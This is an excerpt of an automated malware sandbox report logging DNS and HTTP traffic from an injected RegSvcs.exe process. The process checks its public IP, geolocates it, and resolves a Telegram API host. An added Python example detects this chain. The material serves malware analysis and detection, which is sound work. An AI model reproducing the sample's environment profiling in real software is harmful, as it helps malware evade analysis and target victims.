Jan 2, 2025 13:45:45.805685997 CET | 53 | 60830 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 13:45:04.105060101 CET | 192.168.2.5 | 1.1.1.1 | 0x28cc | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:07.959597111 CET | 192.168.2.5 | 1.1.1.1 | 0x361f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:45.798938036 CET | 192.168.2.5 | 1.1.1.1 | 0x3d23 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 13:45:04.111818075 CET | 1.1.1.1 | 192.168.2.5 | 0x28cc | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 13:45:04.111818075 CET | 1.1.1.1 | 192.168.2.5 | 0x28cc | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:04.111818075 CET | 1.1.1.1 | 192.168.2.5 | 0x28cc | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:04.111818075 CET | 1.1.1.1 | 192.168.2.5 | 0x28cc | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:04.111818075 CET | 1.1.1.1 | 192.168.2.5 | 0x28cc | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:04.111818075 CET | 1.1.1.1 | 192.168.2.5 | 0x28cc | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:07.966772079 CET | 1.1.1.1 | 192.168.2.5 | 0x361f | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:07.966772079 CET | 1.1.1.1 | 192.168.2.5 | 0x361f | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 13:45:45.805685997 CET | 1.1.1.1 | 192.168.2.5 | 0x3d23 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 13:45:04.122697115 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 2, 2025 13:45:07.592010975 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:07 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2fe371107cdc7c5523e735b4bd9803ad
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 13:45:07.596676111 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 2, 2025 13:45:07.923041105 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:07 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 553c6bd8f9bc62e2f01396d9fda831fc
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 2, 2025 13:45:08.708275080 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 2, 2025 13:45:09.511228085 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:09 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b829ae673074a5f56d38aae301c87bee
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 193.122.130.0 | 80 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 13:45:10.143711090 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 2, 2025 13:45:21.753254890 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:21 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ff9fab635679d8cb9e62cf665ca1b4cc
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49725 | 193.122.130.0 | 80 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 13:45:22.415671110 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 2, 2025 13:45:31.166615009 CET | 745 | IN | HTTP/1.1 504 Gateway Time-out
Date: Thu, 02 Jan 2025 12:45:31 GMT
Content-Type: text/html
Content-Length: 557
Connection: keep-alive
X-Request-ID: ca22e756752416a2e24092d4b8384e18
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49772 | 193.122.130.0 | 80 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 13:45:31.187661886 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 2, 2025 13:45:36.264492989 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:36 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7f31bad449bc4fbc6f6b9dbe2bb2f921
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49812 | 193.122.130.0 | 80 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 13:45:36.900193930 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 2, 2025 13:45:37.530512094 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:37 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a4c944a0bb163b7c2cd5433e6835a506
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49821 | 193.122.130.0 | 80 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 13:45:38.160829067 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 2, 2025 13:45:38.732606888 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:38 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e7737516eeb04e62b1d3b723e884df70
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49829 | 193.122.130.0 | 80 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 13:45:39.392632008 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 2, 2025 13:45:41.702373981 CET | 321 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:41 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6f22e28e40a3a03c317a27c6b92bbcd2
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49847 | 193.122.130.0 | 80 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 13:45:42.329452038 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 2, 2025 13:45:45.782963991 CET | 745 | IN | HTTP/1.1 504 Gateway Time-out
Date: Thu, 02 Jan 2025 12:45:45 GMT
Content-Type: text/html
Content-Length: 557
Connection: keep-alive
X-Request-ID: 30660bce6aa5ffdb08b0040183ed9273
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:08 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-02 12:45:08 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:08 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1136697
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6jEiwXETP%2FkWTL19FgEF%2BCouXB1xQS0F%2FS2Z7EJfXe8JsdddLIJMRcprZLdLPz7C7O9qbLg9k7e7ZBgNkPr96PtB02TmTkt3AIYgSHa%2FkIJoXUiNRLSwSJ2C5nDzm5h2rMjggYJO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fbad830e8ac0f99-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1691&rtt_var=654&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1726788&cwnd=164&unsent_bytes=0&cid=479ef45474c44060&ts=250&x=0"
2025-01-02 12:45:08 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
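The two exchanges above are the report's evidence for "Tries to detect the country of the analysis system (by using the IP)": the injected RegSvcs.exe process (PID 6608) asks checkip.dyndns.org for its public address with a hard-coded, obsolete MSIE 6.0 User-Agent, retries through the 504s, and then feeds the returned address to reallyfreegeoip.org/xml/<ip> to learn the country code. The following Python is an added example, not code from the report or from Joe Sandbox. It parses both response bodies (including the truncated geolocation XML exactly as it was captured) and runs a detection over a constructed, normalised event list modelled on the sessions above; the event dict layout, the `SUSPECT_PROCESSES` set and the sample events are assumptions made for the example.

```python
"""Detection logic for the public-IP check and geolocation chain captured above.

Added example (not Joe Sandbox code): the event dicts below are a hypothetical
normalised form of the report's HTTP sessions, built inline so this runs offline.
"""
import re
import xml.etree.ElementTree as ET

# Observables copied from the sessions in the report.
CHECKIP_HOST = "checkip.dyndns.org"
GEOIP_HOST = "reallyfreegeoip.org"
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
# RegSvcs.exe is the injected host process in this report; it is a .NET
# framework utility with no legitimate reason to fetch web pages. Extend this
# set with other unexpected hosts in your environment (assumption for the example).
SUSPECT_PROCESSES = {"regsvcs.exe"}

IP_RE = re.compile(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")
GEO_PATH_RE = re.compile(r"^/xml/(\d{1,3}(?:\.\d{1,3}){3})$")
ELEMENT_RE = re.compile(r"<(\w+)>([^<]*)</\1>")


def parse_checkip_body(body):
    """Return the public IP echoed by checkip.dyndns.org, or None (e.g. for a 504 page)."""
    m = IP_RE.search(body)
    return m.group(1) if m else None


def parse_geoip_xml(body):
    """Return the fields of a reallyfreegeoip.org XML response as a dict.

    The report's capture is cut off mid-element ("</TimeZo"), so a strict XML
    parse raises; fall back to a tolerant per-element regex in that case and
    keep whatever complete elements survived.
    """
    try:
        root = ET.fromstring(body)
        return {child.tag: (child.text or "").strip() for child in root}
    except ET.ParseError:
        return dict(ELEMENT_RE.findall(body))


def detect_ip_geo_chain(events):
    """Flag the IP-check / geolocation pattern over chronologically ordered events.

    Each event is a dict with keys pid, process, host, path, user_agent, body
    (body = response payload, "" when none). Returns (pid, kind, detail) tuples.
    """
    findings = []
    learned_ips = {}  # pid -> public IP that checkip returned to that process
    for ev in events:
        proc = ev["process"].rsplit("\\", 1)[-1].lower()
        if ev["host"] == CHECKIP_HOST:
            if proc in SUSPECT_PROCESSES or ev["user_agent"] == LEGACY_UA:
                findings.append((ev["pid"], "ip-check",
                                 f"{proc} -> {CHECKIP_HOST} with UA {ev['user_agent']!r}"))
            ip = parse_checkip_body(ev["body"])
            if ip:
                learned_ips[ev["pid"]] = ip
        elif ev["host"] == GEOIP_HOST:
            m = GEO_PATH_RE.match(ev["path"])
            if not m:
                continue
            ip = m.group(1)
            geo = parse_geoip_xml(ev["body"])
            # The address being geolocated is the one the same process just
            # learned: the malware is profiling the machine it runs on.
            kind = "geo-lookup-of-own-ip" if learned_ips.get(ev["pid"]) == ip else "geo-lookup"
            findings.append((ev["pid"], kind,
                             f"{proc} looked up {ip} -> {geo.get('CountryCode', '?')}"))
    return findings


# Constructed sample mirroring sessions 1-2 of the HTTP table and session 0 of
# the HTTPS table above, plus one benign browser request as a negative control.
REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
CHECKIP_OK = ("<html><head><title>Current IP Check</title></head>"
              "<body>Current IP Address: 8.46.123.189</body></html>\r\n")
CHECKIP_504 = "<html>\r\n<head><title>504 Gateway Time-out</title></head>\r\n<body>\r\n</body>\r\n</html>\r\n"
GEOIP_TRUNCATED = ("<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>\n\t"
                   "<CountryName>United States</CountryName>\n\t<RegionCode>NY</RegionCode>\n\t"
                   "<RegionName>New York</RegionName>\n\t<City>New York</City>\n\t"
                   "<ZipCode>10118</ZipCode>\n\t<TimeZone>America/New_York</TimeZo")

SAMPLE_EVENTS = [
    {"pid": 6608, "process": REGSVCS, "host": CHECKIP_HOST, "path": "/",
     "user_agent": LEGACY_UA, "body": CHECKIP_OK},
    {"pid": 6608, "process": REGSVCS, "host": GEOIP_HOST, "path": "/xml/8.46.123.189",
     "user_agent": "", "body": GEOIP_TRUNCATED},
    {"pid": 6608, "process": REGSVCS, "host": CHECKIP_HOST, "path": "/",
     "user_agent": LEGACY_UA, "body": CHECKIP_504},
    {"pid": 4242, "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "host": "www.example.com", "path": "/", "user_agent": "Mozilla/5.0", "body": ""},
]

if __name__ == "__main__":
    for pid, kind, detail in detect_ip_geo_chain(SAMPLE_EVENTS):
        print(f"[{pid}] {kind}: {detail}")
```

checkip.dyndns.org and similar services are also used by legitimate software, so the hostname alone is a weak indicator; the stronger signals, which the detector keys on, are the requesting process (a .NET framework utility) together with the obsolete User-Agent, and the correlation between the address checkip returned to that PID and the address it then geolocates. The 504 responses in sessions 2 and 7 show the sample simply retrying, so the parser returns None for those bodies instead of failing.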


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | 6608 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 12:45:09 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-02 12:45:10 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Thu, 02 Jan 2025 12:45:10 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1136699
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eURiKwG9iBN94PiH56OdNyt15F7EppvFvzdN%2BF4LMw9kpTECYp2g0Z2h%2FiGgXiNFU5PgPoqFcI6kYpZXUmrSxgGSLuHq4%2FYrTg2xIljXwswN%2F7Hvhqj2bKsyzCkKWG4j3Xv5lxd1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fbad839e93843da-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1608&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1803582&cwnd=203&unsent_bytes=0&cid=c99f297818088157&ts=150&x=0"
2025-01-02 12:45:10 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
